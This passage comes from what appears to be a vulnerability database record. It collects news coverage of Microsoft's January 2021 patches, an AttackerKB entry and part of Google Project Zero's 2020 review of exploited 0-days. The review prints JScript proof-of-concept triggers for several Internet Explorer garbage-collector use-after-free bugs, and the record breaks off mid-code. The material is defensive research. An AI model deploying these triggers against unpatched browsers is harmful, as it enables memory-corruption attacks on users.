8.8), and five critical RCE flaws in Remote Procedure Call Runtime.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T05:01:00", "type": "thn", "title": "Microsoft Issues Patches for Defender Zero-Day and 82 Other Windows Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1674", "CVE-2021-1705"], "modified": "2021-01-13T05:01:20", "id": "THN:9CF96D7230D0DBA395C1DEDA718226AD", "href": "https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-01-13T02:27:43", "description": "**Microsoft** today released updates to plug more than 80 security holes in its **Windows** operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. Ten of the flaws earned Microsoft's most-dire "critical" rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nMost concerning of this month's batch is probably a critical bug ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in Microsoft's default anti-malware suite -- **Windows Defender** -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it's not entirely clear how this is being exploited.\n\nBut **Kevin Breen**, director of research at **Immersive Labs**, says depending on the vector the flaw could be trivial to exploit.\n\n"It could be as simple as sending a file," he said. "The user doesn't need to interact with anything, as Defender will access it as soon as it is placed on the system."\n\nFortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.\n\nBreen called attention to another critical vulnerability this month -- [CVE-2020-1660](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1660>) -- which is a remote code execution flaw in nearly every version of Windows that earned a [CVSS score](<https://www.first.org/cvss/>) of 8.8 (10 is the most dangerous).\n\n"They classify this vulnerability as 'low' in complexity, meaning an attack could be easy to reproduce," Breen said. "However, they also note that it\u2019s 'less likely' to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us."\n\nCVE-2020-1660 is actually just one of five bugs in a core Microsoft service called **Remote Procedure Call** (RPC), which is responsible for a lot of heavy lifting in Windows. Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.\n\n**Allan Liska**, senior security architect at **Recorded Future**, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- [CVE-2019-1409](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1409>) and [CVE-2018-8514](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-8514>) -- were not widely exploited.\n\nThe remaining 70 or so flaws patched this month earned Microsoft's less-dire "important" ratings, which is not to say they're much less of a security concern. Case in point: [CVE-2021-1709](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1709>), which is an "elevation of privilege" flaw in Windows 8 through 10 and Windows Server 2008 through 2019.\n\n"Unfortunately, this type of vulnerability is often quickly exploited by attackers," Liska said. "For example, [CVE-2019-1458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458>) was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching."\n\n**Trend Micro's ZDI Initiative** pointed out another flaw marked "important" -- [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>), an elevation of privilege bug in Windows 8, 10 and some Windows Server 2012 and 2019 that was publicly disclosed by ZDI prior to today.\n\n"It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch," ZDI's **Dustin Childs** said. "The previous CVE was being exploited in the wild, so it\u2019s within reason to think this CVE will be actively exploited as well.\u201d\n\nSeparately, Adobe released security updates to tackle at least eight vulnerabilities [across a range of products](<https://blogs.adobe.com/psirt/?p=1960>), including **Adobe Photoshop** and **Illustrator**. There are no **Flash Player** updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft's update cycle from last month removed the program from Microsoft's browsers.\n\nWindows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nPlease back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), [Acronis](<https://www.acronis.com/en-us/products/true-image/>) and [Macrium](<https://www.macrium.com/>) are two that I've used previously and are worth a look.\n\nThat said, there don't appear to be any major issues cropping up yet with this month's update batch. But before you apply updates consider paying a visit to [AskWoody.com](<https://www.askwoody.com/category/microsoft-windows-patches-security/>), which usually has the skinny on any reports about problematic patches.\n\nAs always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T01:32:20", "type": "krebs", "title": "Microsoft Patch Tuesday, January 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2019-1458", "CVE-2020-1660", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1660", "CVE-2021-1709"], "modified": "2021-01-13T01:32:20", "id": "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "href": "https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-13T05:41:44", "description": "Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its [January Patch Tuesday roundup of fixes](<https://msrc.microsoft.com/update-guide>). In total it patched 83 vulnerabilities.\n\nThe most serious bug is a flaw in Microsoft\u2019s Defender anti-malware software that allows remote attackers to infect targeted systems with executable code. Security experts are warning that Windows users who have not connected to internet recently and received an auto-update, should patch now.\n\n\u201cThis bug in the Microsoft Malware Protection Engine may already be patched on your system as the engine auto-updates as needed. However, if your systems are not connected to the internet, you\u2019ll need to manually apply the patch,\u201d wrote Dustin Childs, Trend Micro\u2019s Zero Day Initiative (ZDI) security manager. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nResearchers believe the vulnerability, [tracked as CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), has been exploited for the past three months and was leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>). Last month, Microsoft said state-sponsored hackers had compromised its internal network and leveraged additional Microsoft products to conduct further attacks.\n\nAffected versions of Microsoft Malware Protection Engine range from 1.1.17600.5 to 1.1.17700.4 running on Windows 10, Windows 7 and 2004 Windows Server, [according t](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)o the security bulletin.\n\n## **Publicly Known Bug Fixed Twice **\n\nMicrosoft patched a second vulnerability, that researchers believe was also being exploited in the wild, tracked as [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>). The flaw is classified as an elevation-of-privilege bug and impacts the Windows [print driver process SPLWOW64.exe](<https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p>).\n\nThe bug first discovered by Google and patched. But ZDI believes that patch was insufficient and opened the door to further attacks. Childs said that ZDI re-discovered the flaw a second time, which Microsoft is patched again Tuesday.\n\n\u201cThe previous patch introduced a function to check an input string pointer, but in doing so, it introduced an Out-of-Bounds (OOB) Read condition. Additional bugs are also covered by this patch, including an untrusted pointer deref,\u201d Childs wrote in a prepared [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review>).\n\n## **Additional Critical Bugs **\n\nEight additional bugs rated critical were also part of Microsoft\u2019s Tuesday vulnerability fixes.\n\nThese included a remote code-execution bug in Microsoft\u2019s Edge web browser. The vulnerability (CVE-2021-1705) is memory-related and tied to a the way the browser improperly access objects in memory.\n\n\u201cSuccessful exploitation of the vulnerability could enable an attacker to gain the same privileges as the current user,\u201d wrote Justin Knapp, senior product marketing manager with Automox, in prepared analysis. \u201cIf the current user is logged on with admin rights, an attacker could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website.\u201d\n\nAdditional critical bugs were tied to Windows Graphics Device Interface (CVE-2021-1665), HEVC Video Extensions (CVE-2020-1643), and the Microsoft DTV-DVD Video Decoder (CVE-2020-1668).\n\nFive January Patch Tuesday flaws (CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667 and CVE-2021-1673) were each remote procedure call bugs. As the name suggests, the vulnerability exists in Windows Remote Procedure Call authentication process. If exploited, an attacker could gain elevation of privileges, run a specially crafted application and take complete control of the targeted system.\n\n\u201cWith the SolarWinds breach still fresh from December and the scope of impact growing by the day, there\u2019s a reaffirmed urgency for organizations to implement best practices for even the most basic security habits,\u201d Knapp wrote. \u201cWhether it\u2019s patching zero-day vulnerabilities within a 24-hour window or implementing strong password protocols, the need for security diligence has never been more evident.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-12T21:45:23", "type": "threatpost", "title": "Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1643", "CVE-2020-1668", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1673", "CVE-2021-1705"], "modified": "2021-01-12T21:45:23", "id": "THREATPOST:B879E243998561911585BBD37B7F33E9", "href": "https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}], "attackerkb": [{"lastseen": "2022-09-04T08:04:27", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\n**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-0986", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "modified": "2020-07-24T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-07-30T19:23:21", "description": "A Year in Review of 0-days Exploited In-The-Wild in 2020\n\nPosted by Maddie Stone, Project Zero\n\n2020 was a year full of 0-day exploits. Many of the Internet\u2019s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches \u2014 patches that don\u2019t correctly and comprehensively fix the root cause of a vulnerability \u2014 allow attackers to use 0-days against users with less effort.\n\nSince mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero\u2019s mission has been to \u201cmake 0-day hard\u201d. From that came the goal of our in-the-wild program: \u201cLearn from 0-days exploited in-the-wild in order to make 0-day hard.\u201d In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public\u2019s understanding of 0-day exploitation is only helpful when it doesn\u2019t diverge from the \u201cprivate state-of-the-art\u201d, what attackers are doing and are capable of. \n\nOver the last 18 months, we\u2019ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. [For the 2nd year in a row](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we\u2019re publishing a \u201cYear in Review\u201d report of the previous year\u2019s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our[ root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). \n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another. \n\n\nProduct\n\n| \n\nVulnerability exploited in-the-wild\n\n| \n\nVariant of... \n \n---|---|--- \n \nMicrosoft Internet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2018-8653* CVE-2019-1367* CVE-2019-1429* \n \nMozilla Firefox\n\n| \n\nCVE-2020-6820\n\n| \n\nMozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>) \n \nGoogle Chrome\n\n| \n\nCVE-2020-6572\n\n| \n\nCVE-2019-5870\n\nCVE-2019-13695 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2019-0880* \n \nGoogle Chrome/Freetype\n\n| \n\nCVE-2020-15999\n\n| \n\nCVE-2014-9665 \n \nApple Safari\n\n| \n\nCVE-2020-27930\n\n| \n\nCVE-2015-0093 \n \n* vulnerability was also exploited in-the-wild in previous years \n \n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy Javascript engine in Internet Explorer. While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i < 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i < 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i < 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. [CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). \n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) 